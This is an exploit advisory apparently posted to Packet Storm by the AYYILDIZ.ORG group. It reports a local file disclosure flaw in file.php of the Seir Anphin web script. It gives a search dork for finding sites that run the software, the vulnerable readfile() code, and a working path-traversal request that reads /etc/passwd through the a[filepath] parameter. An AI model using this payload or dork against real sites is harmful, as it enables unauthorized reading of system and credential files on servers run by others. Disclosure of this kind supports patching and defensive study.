Seir Anphin is susceptible to a local file disclosure vulnerability in file.php.
61c534b8d0ab9614b968a3cd571c92ebf1e2ce39d50594e76c0148fe70c70f52----------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...
Script: Seir Anphin
Script Download: http://www.anphin.com/index.php?m=file&op=download&id=1
Dork:"Powered by Seir Anphin"
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
info: */Siz Yokken AYYILDIZ Vardi.*/
-----------------------------------------------------------------------------------
Bug:
exit();
header("Content-Disposition: attachment; filename=\"$filename\"");
header('Content-Length: ' . filesize($a['filepath']));
readfile($a['filepath']);
exit();
-----------------------------------------------------------------------------------
Exploit: [Seir_Anphin_Path]/modules/file.php?a[filepath]=../../../etc/passwd
-----------------------------------------------------------------------------------
Tnx:H0tturk,Dr.Max Virus,Gencnesil,Str0ke
Special Tnx: AYYILDIZ.ORG
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed